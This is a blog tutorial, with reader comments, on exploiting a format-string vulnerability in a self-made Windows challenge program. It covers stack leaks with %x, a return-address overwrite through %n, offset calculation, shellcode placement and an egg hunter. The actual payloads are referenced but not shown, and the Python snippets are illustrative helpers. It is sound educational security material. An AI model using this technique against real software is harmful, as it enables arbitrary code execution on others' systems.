Exploiting Format Strings in Windows

I put together a small challenge on exploiting format strings in Windows. This is how it looks: it asks for a filename to open. At first this might be a bit confusing, since there are no vulnerable functions involved in reading a file. Notice, however, that the first argument to the program is echoed back in the output.

Let’s investigate this inside a debugger. As you can see, if argc == 2 the application continues and argv[1] is passed into the highlighted function.

Inside that function, memset is used to fill the buffer with zeros and strncpy is used to copy the user input into it. But notice that EAX, which holds the address of that buffer, is passed directly to printf with no format string of its own. In other words, printf treats our buffer as the format string. This is quite interesting.

Let’s try to read the stack using the %X format specifier, which prints a value in hexadecimal. As you can see, printf reads successive values off the stack, moving from lower to higher addresses.

I will give 80 A characters and a bunch of %x format strings and see the output.

You can see 41, which is the hex value of A, and 2558, which is %X.
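A quick way to confirm that reading is to decode the hex digits back to ASCII. The sketch below uses Python purely for illustration, and the helper name is hypothetical:

```python
def hex_to_ascii(hex_digits: str) -> str:
    """Decode a run of hex digits, as printed by %X, into ASCII text."""
    return bytes.fromhex(hex_digits).decode("ascii")

print(hex_to_ascii("41"))    # A
print(hex_to_ascii("2558"))  # %X
```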

We can use %n to store the number of characters written so far, up to the point where %n appears in the format string. Nothing is displayed for %n itself; instead, we must pass the address of an integer variable, and printf writes the count to that memory location. For example,

This will print the value 6.
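To make the mechanism concrete, here is a toy model of how printf handles %x and %n. It is a sketch only: toy_printf, the args list (standing in for the values printf pulls off the stack) and the memory dictionary are all hypothetical names for illustration, not the real CRT implementation.

```python
import re

def toy_printf(fmt: str, args: list, memory: dict) -> str:
    """Toy model of printf supporting only %x / %X (optional width) and %n.

    args stands in for the values printf reads off the stack;
    memory maps addresses to the integers stored there.
    """
    out = []
    written = 0      # characters produced so far
    next_arg = 0     # index of the next value to consume
    pos = 0
    for m in re.finditer(r"%(\d*)([xXn])", fmt):
        literal = fmt[pos:m.start()]
        out.append(literal)
        written += len(literal)
        width, conv = m.group(1), m.group(2)
        value = args[next_arg]
        next_arg += 1
        if conv == "n":
            # %n prints nothing: it stores the running count at the address
            memory[value] = written
        else:
            text = format(value, conv).rjust(int(width or 0))
            out.append(text)
            written += len(text)
        pos = m.end()
    out.append(fmt[pos:])
    return "".join(out)

memory = {}
COUNT_ADDR = 0x1000  # hypothetical address of an int variable
toy_printf("Hello %n", [COUNT_ADDR], memory)
print(memory[COUNT_ADDR])  # 6, the length of "Hello "
```

The important point is that the address used by %n is just the next value on the stack. If an attacker controls that value, they control where the count is written.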

So, let’s try placing a %n in the input and see what happens.

The program crashed while trying to write to an address. Let’s see what happened inside the debugger.
This is where things go wrong. The value of ECX is written to the address that EAX points to.

Let’s check the registers. EAX contains 78257825 which is “x%x%” and ECX contains f8.
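The debugger shows the register most-significant byte first, while x86 stores it little-endian, so the four bytes picked up from our input sit in memory in the reverse order. A small sketch using Python's struct module shows both views. ECX is presumably the running character count that %n was about to store:

```python
import struct

eax = 0x78257825
ecx = 0xF8

as_displayed = eax.to_bytes(4, "big")  # bytes in the order the debugger prints them
in_memory = struct.pack("<I", eax)     # bytes in the order they sit in the buffer

print(as_displayed)  # b'x%x%'
print(in_memory)     # b'%x%x'
print(ecx)           # 248
```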

Let’s examine the stack. If we go down the stack, we can see our injected characters. This suggests a nice idea: place the shellcode where the ‘A’ characters are.

At the end of the function epilogue, when RET executes, EIP is loaded with the return address stored on the stack, which points back into the calling function.

If we check the call stack, we can see the first frame pointer, which points to 0019f72c.

The return address is stored right above it at 0019f730, and it holds 00401188, an address in the calling function. Notice that the address 0019f730 has a null byte at the front. This won’t be an issue if we write the address at the end of our payload in little-endian format, because the null byte then becomes the last byte, where the string terminator sits anyway.
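The little-endian layout can be checked with Python's struct module. This is a sketch: the constant names are made up for illustration, and the addresses are the ones observed in this debugging session.

```python
import struct

FRAME_POINTER = 0x0019F72C      # saved EBP location seen in the call stack
RET_SLOT = FRAME_POINTER + 4    # the return address sits just above the saved EBP

packed = struct.pack("<I", RET_SLOT)
print(hex(RET_SLOT))  # 0x19f730
print(packed)         # b'0\xf7\x19\x00'
```

Only the first three bytes need to be supplied in the payload. The trailing 0x00 lines up with the end of the string.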

Here’s the plan. We can control both ECX and EAX in this scenario. We can put the address of our shellcode in ECX and the address of the stack slot holding the return address in EAX. Once the program hits “mov dword ptr [eax],ecx”, the address of the shellcode will overwrite the return address on the stack. When the program reaches the end of the function and hits the epilogue (LEAVE, RET), EIP will be loaded with our newly written address, which points to our shellcode.

Alright, the plan sounds cool, so let’s implement it and try it out.
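The plan can be modelled in a few lines of Python. This is only a sketch: the dictionary stands in for stack memory, the function names are hypothetical, and 0019f758 is the shellcode address identified later in the post.

```python
RET_SLOT = 0x0019F730        # stack slot holding the return address
ORIGINAL_RET = 0x00401188    # where the function would normally return
SHELLCODE_ADDR = 0x0019F758  # shellcode location used later in the post

stack = {RET_SLOT: ORIGINAL_RET}

def store_dword(memory: dict, eax: int, ecx: int) -> None:
    """Model of `mov dword ptr [eax], ecx`."""
    memory[eax] = ecx & 0xFFFFFFFF

def ret(memory: dict, esp: int) -> int:
    """Model of RET: the new EIP is the dword at the top of the stack."""
    return memory[esp]

store_dword(stack, eax=RET_SLOT, ecx=SHELLCODE_ADDR)
eip = ret(stack, esp=RET_SLOT)
print(hex(eip))  # 0x19f758
```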
First, we should make EAX point to the return address. My first payload was something like this. As seen earlier, EAX contains 78257825, which is “x%x%”.

We must keep experimenting until EAX holds our 4 B characters. I kept increasing the number of “%x” specifiers and finally got EAX to hold “BBBB”. So, the next payload I tried was this.
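The original payloads are not reproduced here, so the following is a hedged sketch of how such probes could be generated. The layout (filler, then repeated %x, then %n, then the 4-byte marker at the end) is an assumption inferred from the description, and build_probe is a hypothetical helper.

```python
def build_probe(filler_len: int, num_reads: int, marker: bytes = b"BBBB") -> bytes:
    """Assumed layout: 'A' filler, num_reads copies of %x, one %n, then the marker."""
    return b"A" * filler_len + b"%x" * num_reads + b"%n" + marker

# 41 and 51 are the %x counts mentioned in the post; the rest is illustrative.
for n in (41, 51):
    probe = build_probe(80, n)
    print(n, len(probe))
```

Each additional %x makes printf consume one more stack value before it reaches %n, which is why the count is adjusted until the address used by %n is the marker.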

Let’s try to control the ECX register by making it point to our address of shellcode. As in the previous image our shellcode is located at 0019f758. Let’s divide this number by 4.

0x0019f758/4 = 425430

Let’s give this value to the %x format specifier, which will change the value of ECX. At the same time, I am going to increase the number of %x specifiers from 41 to 51 so that EAX still ends up holding our Bs. This %x reads 2 characters at once. We must keep experimenting until we reach our goal.

Now ECX holds 0019f940, but we need it to hold 0019f758.

Let’s find the difference and try again.

0x0019f940 – 0x0019f758 = 488

By adding 488 to our last format string we should get somewhere close to our goal. Let’s try it out.

425430 + 488 = 425918

Now ECX points to 19fb28. Let’s again find the difference.

0x19fb28 – 0x19f758 = 976

By subtracting the difference from the last format string, we should get ECX pointing to the exact address we need.

425918 - 976 = 424942

Now ECX holds 19f758, which is the location where we are going to place our shellcode.
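The arithmetic above can be replayed in Python. The sketch assumes that one unit of width moves ECX by one, which matches the observation that adding 488 raised ECX by 0x1E8. The helper corrected_width is hypothetical.

```python
TARGET = 0x0019F758  # where ECX must point (shellcode address)

def corrected_width(width: int, observed_ecx: int, target: int = TARGET) -> int:
    """Shift the width by the signed miss between observed and wanted ECX."""
    return width - (observed_ecx - target)

first_width = TARGET // 4
print(first_width)               # 425430
print(0x0019F940 - TARGET)       # 488
print(first_width + 488)         # 425918
print(0x0019FB28 - TARGET)       # 976
print(corrected_width(425918, 0x0019FB28))  # 424942
print(corrected_width(425430, 0x0019F940))  # 424942
```

The last line shows that subtracting the first difference from the first attempt would have given the final value directly. Adding it moved ECX further away by the same amount, which is why the second difference is exactly twice the first.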

Since we only have 80 A characters of space, I will first try to write my own small shellcode to pop calc, because increasing the number of A characters again would make recalculating the offsets a pain. I will use the WinExec API to launch calc. Let’s find its address.

This is a simple asm code that I’ve written to call the WinExec API.

This is our final exploit.

Let’s have a final look inside the debugger.

The value of ECX, 0019f758, is going to be written to the address held in EAX, 0019f730, which is the stack slot containing our return address. If we follow the address in ECX, we can see it points to our shellcode.

As soon as the function returns, EIP will point to our shellcode.

Once we run this exploit, w00t! We get our calculator.

How about we use an egg hunter to find our shellcode? One may argue we could use a long jump, or place the shellcode directly at the beginning. Still, I thought of using this for fun and out of curiosity.

First, I checked for bad chars and found “\x00\x09\x20” to be the bad chars in this program. Here’s the exploit with the egg hunter. Note that the offsets might change on different Windows platforms.
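Before using any shellcode or egg hunter, it is worth scanning it for these bytes. Below is a minimal sketch with a hypothetical helper, find_bad_bytes. The tab and space are presumably bad because the payload travels as a command-line argument, where whitespace splits arguments, while the null byte ends the string.

```python
BAD_CHARS = b"\x00\x09\x20"  # null, tab, space (as reported in the post)

def find_bad_bytes(payload: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, byte value) pairs for every bad byte found in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]

print(find_bad_bytes(b"\x90\x90\x20\x41"))  # [(2, 32)]
print(find_bad_bytes(b"\x30\xf7\x19\x00"))  # [(3, 0)]
print(find_bad_bytes(b"\x90\x41\x42"))      # []
```

The second call shows why the return address slot has to go last: its only bad byte is the final one.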

This method of exploitation is compiler dependent. I have tested it with the Embarcadero C++ (Borland C++) and Visual C++ 2000 compilers. With other compilers, the printf implementation is not the same as in these. You can research more on other compilers.

9 thoughts on “Exploiting Format Strings in Windows”

  1. Hey, how did you know that the address of BBB will always be last? is printf in windows acts differently than printf in linux? i mean, usually if you use %n in printf vulnerabilities the address that you want to write should be at the begining no?

    • Actually the printf function is compiled in different ways in different compilers under Windows 🙂 I kept on adding “%X” till I reach the end of the payload. I added “BBBB” at the end since the return address has null characters.

  2. how did you use nonprintable characters as arguments when running executable in windbg for your last stage of exploit (when you were debugging the working exploit code) with 0x0019f730 (i.e. how did you input this in windbg)
